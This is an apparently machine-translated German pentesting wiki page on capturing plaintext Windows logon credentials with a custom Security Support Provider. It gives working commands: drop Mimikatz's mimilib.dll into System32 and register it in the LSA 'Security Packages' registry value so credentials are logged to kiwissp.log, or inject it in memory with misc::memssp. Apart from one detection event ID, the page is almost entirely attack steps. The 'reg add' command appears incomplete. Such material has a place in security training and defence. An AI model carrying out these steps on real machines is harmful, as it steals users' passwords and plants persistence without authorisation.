Custom SSP

Custom SSP

Lerne, was ein SSP (Security Support Provider) ist, hier. Du kannst dein eigenes SSP erstellen, um Kredentialien im Klartext zu erfassen, die verwendet werden, um auf die Maschine zuzugreifen.

Mimilib

Du kannst die mimilib.dll-Binärdatei verwenden, die von Mimikatz bereitgestellt wird. Dies wird alle Kredentialien im Klartext in einer Datei protokollieren. Lege die dll in C:\Windows\System32\ ab. Hole dir eine Liste der vorhandenen LSA-Sicherheits-Pakete:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Fügen Sie mimilib.dll zur Liste der Sicherheitsunterstützungsanbieter (Sicherheits-Pakete) hinzu:

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

Und nach einem Neustart können alle Anmeldeinformationen im Klartext in C:\Windows\System32\kiwissp.log gefunden werden.

Im Speicher

Sie können dies auch direkt im Speicher mit Mimikatz injizieren (beachten Sie, dass es ein wenig instabil/nicht funktionieren könnte):

privilege::debug
misc::memssp

This won't survive reboots.

Minderung

Ereignis-ID 4657 - Überwachung der Erstellung/Änderung von HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages